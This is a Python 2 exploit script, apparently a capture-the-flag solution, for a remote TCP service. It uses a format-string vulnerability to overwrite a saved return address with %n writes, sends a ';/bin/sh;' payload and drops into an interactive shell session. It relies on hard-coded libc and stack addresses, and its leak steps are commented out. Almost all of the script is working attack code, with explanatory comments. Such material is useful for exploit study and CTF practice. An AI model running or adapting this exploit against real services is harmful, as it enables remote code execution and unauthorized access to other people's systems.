import os
import random
import sys
import struct
import socket
import telnetlib
import time

# Endpoint the script connects to below (plain TCP, no TLS).
host, port = "10.13.37.24", 4001

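def _recv_one(s):
  """Return exactly one received unit from socket *s*, or raise EOFError.

  ``socket.recv(1)`` returns an empty string/bytes once the peer has closed
  the connection; appending that to a buffer would never make progress, so
  the closed-connection case is turned into an exception here.
  """
  chunk = s.recv(1)
  if not chunk:
    raise EOFError("connection closed before the expected marker was received")
  return chunk


def read_until(s, text):
  """Consume data from socket *s* one unit at a time until *text* has just been read.

  A sliding window the length of *text* is kept; the function returns
  (``None``) as soon as the window equals *text*, so the caller's next
  ``s.recv`` starts immediately after the marker.  An empty *text* returns
  at once without reading anything.

  Args:
    s: a connected socket, or any object with a blocking ``recv(n)``.
    text: the marker to wait for; ``str`` on Python 2, ``bytes`` on Python 3.

  Raises:
    EOFError: the peer closed the connection before *text* arrived (the
      original byte-append loop spun forever on the empty reads).
  """
  # Start from an empty value of text's own type so that str (py2) and
  # bytes (py3) both concatenate without a TypeError.
  window = text[:0]
  # Fill the window up to the marker's length first ...
  while len(window) < len(text):
    window += _recv_one(s)
  # ... then slide it one unit at a time until it matches exactly.
  while window != text:
    window = window[1:] + _recv_one(s)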

##########################################################################
# Exploit start
##########################################################################

# Connect to remote host
# Connect to remote host
# Plain TCP socket to host:port defined above; nothing is read from the
# peer before the first send.
s = socket.socket()
s.connect((host, port))

# Manual go-ahead before any payload is sent.  raw_input and the print
# statements below mean this script is Python 2 only (str goes straight
# onto the socket).
raw_input("Go? ")

# XXX: read libc base below
# The leak is disabled: the commented lines used the same three-send
# sequence as the write further down, with a "%19$.8x" directive in the
# second send; read_until() then synced on "--libc-marker-" and the 8 hex
# digits that followed, minus a fixed offset, gave libc_base.  The live run
# hard-codes the "server" value instead, so it is only correct while the
# remote process has exactly that layout ("local" needed a different one).
#s.send("A" * 1024)
#s.send("--libc-marker-%19$.8x".ljust(0x100, "\xcc"))
#s.send("838\0".ljust(0x10, "\0"))
#read_until(s, "--libc-marker-")
#libc_base = int(s.recv(8), 16) - 0x33a55
#libc_base = 0xf7e25000 # local
libc_base = 0xb7e20000 # server
print "[+] libc base: %x" % libc_base

# XXX: read stack pointer below
# Same pattern as the libc leak, with "%14$x" and "--stack-marker-";
# likewise disabled in favour of a hard-coded "server" constant.  Note that
# libc_base is only printed and is never used by the write below.
#s.send("A" * 1024)
#s.send("--stack-marker-%14$x".ljust(0x100, "\xcc"))
#s.send("888\0".ljust(0x10, "\0"))
#read_until(s, "--stack-marker-")
#stack_base = int(s.recv(8), 16) - 0x68
#stack_base = 0xffffd130 # local
stack_base = 0xbffffcf0 # server
print "[+] stack pointer: %x" % stack_base

# XXX: arbitrary write below.
# Format-string injection (CWE-134): the second send is evidently treated by
# the remote service as a printf format string, and its "%n" directives
# store into the two addresses packed into the third send, i.e.
# stack_base - printf_retaddr_offset and that address + 2 (the variable
# name suggests these cover a saved return address; not verifiable here).
# The first send is ";/bin/sh;" padded to 1024 bytes.  No response is read
# back, so the script cannot tell whether the write landed.
printf_retaddr_offset = 0x24
s.send(";/bin/sh;".ljust(1024, "A"))
s.send("%.3671x%8$n%.42374x%9$n".ljust(0x100, "\xcc"))
s.send(("981\0" + struct.pack('I', stack_base - printf_retaddr_offset) + struct.pack('I', stack_base - printf_retaddr_offset + 2)).ljust(0x10, "\0"))

# Give control to user
# Reuse the already-connected socket as a telnetlib session so the operator
# can interact with whatever is on the other end.  The socket is never
# closed explicitly.  telnetlib was removed from the standard library in
# Python 3.13 (PEP 594).
t = telnetlib.Telnet()
t.sock = s
t.interact()

